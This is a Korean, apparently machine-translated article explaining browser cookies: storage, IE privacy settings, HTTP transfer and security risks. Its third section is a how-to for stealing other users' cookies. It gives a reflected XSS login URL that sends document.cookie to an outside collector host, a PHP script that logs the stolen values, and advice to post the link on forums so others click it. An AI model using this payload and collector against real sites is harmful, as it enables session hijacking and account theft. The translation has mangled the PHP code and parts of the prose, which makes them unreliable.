쿠키는 영어로 작은 디저트를 의미하며, 브라우저에서 이 단어를 항상 볼 수 있습니다. 음식은 브라우저와 어떤 관련이 있을까요? 이전에 로그인했던 웹사이트를 탐색할 때 웹페이지에 다음과 같은 메시지가 표시되는 경우가 있습니다. 안녕하세요 XX님, 마치 작은 디저트를 먹는 듯한 친근한 느낌입니다. 이는 실제로 호스트의 파일에 액세스하여 이루어지므로 이 파일을 쿠키라고도 합니다. 쿠키에 대한 모든 것을 알고 싶으십니까? 아래를 살펴보세요!
1. 쿠키 이해 적용 대상: 초보 독자
쿠키는 귀하가 웹사이트를 탐색할 때 웹사이트가 귀하의 컴퓨터에 저장하는 작은 텍스트 파일입니다. 귀하가 방문할 때 귀하의 사용자 ID, 비밀번호, 웹 페이지 탐색, 소요 시간 및 기타 정보를 기록합니다. 다시 웹사이트에 접속하면, 웹사이트는 쿠키를 읽어 귀하의 관련 정보를 학습하고, 귀하를 환영하는 슬로건을 해당 페이지에 표시하거나, 귀하가 아이디나 비밀번호를 입력하지 않고도 직접 열람할 수 있도록 하는 등의 조치를 취할 수 있습니다. . IE의 "도구/인터넷 옵션"의 "일반" 탭에서 "설정/파일 보기"를 선택하면 귀하의 컴퓨터에 저장된 모든 쿠키를 볼 수 있습니다. 이러한 파일은 일반적으로 user@domain 형식으로 이름이 지정됩니다. 여기서 user는 로컬 사용자 이름이고 domain은 방문 중인 웹사이트의 도메인 이름입니다. NetsCape 브라우저를 사용하는 경우 "C:PROGRAMFILESNETSCAPEUSERS"에 저장됩니다. IE와 달리 NETSCAPE는 쿠키 파일을 사용하여 모든 웹사이트의 쿠키를 기록합니다.
인터넷 보안을 보장하려면 쿠키를 적절하게 설정해야 합니다. "도구/인터넷 옵션"에서 "개인정보" 탭을 엽니다. (이 설정은 IE6.0에만 존재하며, 다른 버전의 IE에서는 "도구/인터넷 옵션" 버튼의 "보안" 탭에서 "사용자 정의 수준"을 클릭하여 간단한 조정) 쿠키의 보안 수준을 조정합니다. 일반적으로 슬라이더를 "중간 높음" 또는 "높음" 위치로 조정할 수 있습니다. 대부분의 포럼 사이트에서는 쿠키 정보 사용이 필요합니다. 이러한 장소에 가지 않을 경우 보안 수준을 "모든 쿠키 차단"으로 조정할 수 있습니다. 개별 웹사이트의 쿠키만 차단하려는 경우 "편집" 버튼을 클릭하여 차단하려는 웹사이트를 목록에 추가할 수 있습니다. "고급" 버튼 옵션에서 자사 쿠키와 제3자 쿠키를 설정할 수 있습니다. 제1사 쿠키는 귀하가 탐색 중인 웹사이트의 쿠키이며, 제3자 쿠키는 귀하가 이용하는 웹사이트에서 귀하에게 전송되는 쿠키가 아닙니다. 일반적으로 그림 1과 같이 타사 쿠키에 대해 "거부"를 선택해야 합니다. 쿠키를 저장해야 하는 경우 IE의 "가져오기 및 내보내기" 기능을 사용하여 "파일/가져오기 및 내보내기"를 열고 프롬프트를 따를 수 있습니다.
쿠키 내용의 대부분은 암호화되어 있으므로 이는 단지 서버의 CGI 처리기에서만 의미 없는 문자와 숫자의 조합으로 보입니다. 일부 소프트웨어를 통해 더 많은 콘텐츠를 볼 수 있습니다. Cookie Pal 소프트웨어를 사용하여 본 쿠키 정보는 그림 2에 나와 있습니다. 서버, 만료, 이름, 값 및 기타 옵션의 내용을 제공합니다. 그 중 서버(Server)는 쿠키를 저장하는 웹사이트이고, 만료(Expires)는 쿠키의 시간과 수명을 기록하며, 이름(Name)과 값(value) 필드는 특정 데이터입니다(이 신문의 10호, 페이지 42에 이 소프트웨어에 대한 자세한 소개가 있습니다).
다운로드 주소: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. 쿠키 전달 프로세스 적용 대상: 중급 독자가 브라우저 주소 표시줄에 웹 사이트의 URL을 입력하면 브라우저는 웹 사이트에 웹 페이지 읽기 요청을 보내고 그 결과를 모니터에 표시합니다. 이때 웹페이지는 Amazon 웹사이트에서 설정한 쿠키 파일을 귀하의 컴퓨터에서 찾아보고, 발견되면 브라우저는 이전에 입력한 URL과 함께 쿠키 파일에 포함된 데이터를 Amazon 서버로 전송합니다. 서버가 쿠키 데이터를 수신하면 귀하의 ID, 쇼핑 기록, 개인 취향 및 기타 정보를 데이터베이스에서 검색하고 새로운 콘텐츠를 기록하며 이를 데이터베이스와 쿠키 파일에 추가합니다. 쿠키가 감지되지 않거나 귀하의 쿠키 정보가 데이터베이스의 정보와 일치하지 않는 경우, 이는 귀하가 처음으로 웹사이트를 탐색하고 있음을 의미하며 서버의 CGI 프로그램은 귀하를 위해 새로운 ID 정보를 생성하여 데이터베이스에 저장합니다.
쿠키는 웹페이지 코드의 HTTP 헤더 정보를 사용하여 전송됩니다. 예를 들어 브라우저가 웹페이지를 열거나 새로 고칠 때 쿠키는 브라우저에서 이루어진 모든 웹페이지 요청과 함께 전송될 수 있습니다. 서버는 웹페이지의 HTTP 헤더 정보에 쿠키를 추가하고 웹페이지 데이터를 귀하의 브라우저로 다시 전송합니다. 브라우저는 귀하 컴퓨터의 쿠키 설정에 따라 이 데이터를 저장할지 여부를 선택합니다. 브라우저에서 쿠키 저장을 허용하지 않는 경우 브라우저를 닫으면 데이터가 사라집니다. 쿠키가 귀하의 컴퓨터에 저장되는 시간은 다르며, 이는 서버 설정에 따라 결정됩니다. 쿠키에는 쿠키 저장 시간을 결정하는 Expires(유효 기간) 속성이 있습니다. 서버는 Expires 필드의 값을 설정하여 쿠키 저장 시간을 변경할 수 있습니다. 이 속성이 설정되지 않으면 쿠키는 웹을 탐색하는 동안에만 유효합니다. 브라우저를 닫으면 이러한 쿠키는 대부분의 웹사이트에서 자동으로 사라집니다. 일반적으로 쿠키에는 서버, 만료, 이름 및 값 필드가 포함되어 있습니다. 이름 및 값 필드만 서버에 유용합니다. 만료 및 기타 필드의 내용은 브라우저에 이러한 쿠키를 처리하는 방법을 알려주는 것입니다.
3. 쿠키 프로그래밍 구현 적용 대상: 고급 리더 대부분의 웹 프로그래밍 언어는 쿠키에 대한 지원을 제공합니다. JavaScript, VBScript, Delphi, ASP, SQL, PHP, C# 등. 이러한 객체 지향 프로그래밍 언어에서 쿠키의 프로그래밍 활용은 기본적으로 유사합니다. 일반적인 프로세스는 먼저 쿠키 객체(객체)를 만든 다음 제어 기능을 사용하여 쿠키에 할당, 읽기, 쓰기 및 기타 작업을 수행하는 것입니다. 그렇다면 코드를 통해 다른 사용자의 쿠키에 있는 민감한 정보를 얻는 방법은 무엇입니까? 간략한 소개는 다음과 같습니다.
이 방법에는 두 가지 주요 단계가 있습니다. 먼저, 쿠키를 수집하고 분석하고 URL을 구성한 다음, PHP 코드를 컴파일하여 쿠키를 수집하고 이를 알지 못하는 사이에 제어할 수 있는 웹사이트에 배치합니다. 코드는 사용자가 생성한 URL을 클릭한 후에 실행될 수 있습니다. 아래에서 구체적인 구현 과정을 살펴보겠습니다.
1. URL을 분석하고 구성합니다.
먼저 쿠키를 수집하려는 웹사이트를 엽니다. 여기서는 웹 사이트에 로그인하고 "<A1>"( 따옴표 없이) 데이터를 분석하고 패킷을 캡처하려면 "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x 형식의 코드를 받으세요. =28&ok.y=6", "<A1>" 교체 "<script>alert(document.cookie)</script>"에 대해 다시 시도하고, 실행이 성공하면 URL 구성을 시작합니다: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". 그 중 http:///www.cbifamily.org/cbi.php 는 특정 호스트에서 제어할 수 있는 스크립트입니다. "%2B"는 "+" 기호의 URL 인코딩이라는 점에 유의해야 합니다. "+"는 공백으로 처리되기 때문입니다. URL을 포럼에 게시하여 다른 사람이 클릭하도록 유도할 수 있습니다.
2. PHP 스크립트를 준비합니다.
이 스크립트의 기능은 쿠키 파일을 수집하는 것입니다.
<?php
$info = getenv("QUERY_STRING");
만약 ($정보) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("위치: http://www.downcodes.com ");
?>
4. 쿠키 보안 문제 적용대상 : 온라인에서 안전을 원하는 모든 독자
1. 쿠키기만
쿠키는 온라인으로 전송되는 경우 일반적으로 MD5 암호화를 사용합니다. 암호화된 정보를 인터넷상에서 어떤 사악한 의도를 가진 사람들이 가로채더라도, 그들에게 보이는 것은 의미 없는 문자와 숫자뿐이기 때문에 그것을 이해할 수 없을 것입니다. 그러나 이제 문제는 쿠키를 가로채는 사람들이 이러한 문자열의 의미를 알 필요가 없고, 다른 사람의 쿠키를 서버에 제출하기만 하면 되며, 확인을 통과할 수 있으면 피해자의 신원을 가장할 수 있다는 것입니다. 웹사이트에 로그인하세요. 이 방법을 쿠키 스푸핑이라고 합니다. 쿠키 스푸핑의 전제조건은 서버의 검증 프로그램에 취약점이 있으며, 사칭자가 사칭 대상자의 쿠키 정보를 얻고 싶어 한다는 것입니다. 현재의 웹사이트 검증 프로그램으로는 불법 로그인을 모두 배제하기가 매우 어렵습니다. 예를 들어 검증 프로그램을 작성하는 데 사용되는 언어에는 허점이 있을 수 있습니다. 또한, 쿠키를 지원하는 언어로 작은 코드 조각을 작성하면 다른 사람의 쿠키를 얻는 것이 매우 쉽습니다(자세한 내용은 방법 3 참조). 수집할 수 있습니다. 포럼에서 HTML 코드를 허용하거나 플래시 태그 사용을 허용하는 경우 이러한 기술을 사용하여 쿠키 코드를 수집하여 포럼에 넣은 다음 게시물에 매력적인 주제를 부여하고 흥미로운 내용을 작성하여 빠르게 많은 수를 수집할 수 있습니다. 쿠키의 . 포럼에서는 이 방법으로 많은 사람들의 비밀번호가 도난당했습니다. 이를 방지하는 방법은 현재로서는 일반적인 보호 방법만 사용할 수 있습니다. 포럼에서는 중요한 비밀번호를 사용하지 말고, 비밀번호를 자동으로 저장하는 IE 기능을 사용하지 말고, 웹사이트에 로그인하지 마세요. 자세히 모르는 곳.
2. 플래시 코드에 숨겨진 위험
플래시에는 getURL() 함수가 있습니다. 플래시는 이 함수를 사용하여 지정된 웹 페이지를 자동으로 열 수 있습니다. 따라서 악성 코드가 포함된 웹사이트로 연결될 수 있습니다. 예를 들어 컴퓨터에서 아름다운 플래시 애니메이션을 감상할 때 애니메이션 프레임의 코드가 조용히 인터넷에 연결되어 특수 코드가 포함된 아주 작은 페이지가 열렸을 수 있습니다. 이 페이지에서는 귀하의 쿠키를 수집하고 귀하의 컴퓨터에 트로이 목마를 설치하거나 하드 드라이브를 포맷하는 등의 다른 작업을 수행할 수 있습니다. 이는 Flash 파일의 내부 동작이므로 웹사이트에서는 이러한 Flash 동작을 금지할 수 없습니다. 우리가 할 수 있는 일은 로컬로 검색하는 경우 방화벽을 열어보는 것입니다. 방화벽이 전송된 데이터 패킷을 알 수 없다는 메시지를 표시하는 경우 이를 금지하는 것이 가장 좋습니다. 인터넷에서 즐기고 싶다면 잘 알려진 대형 웹사이트를 찾는 것이 가장 좋습니다.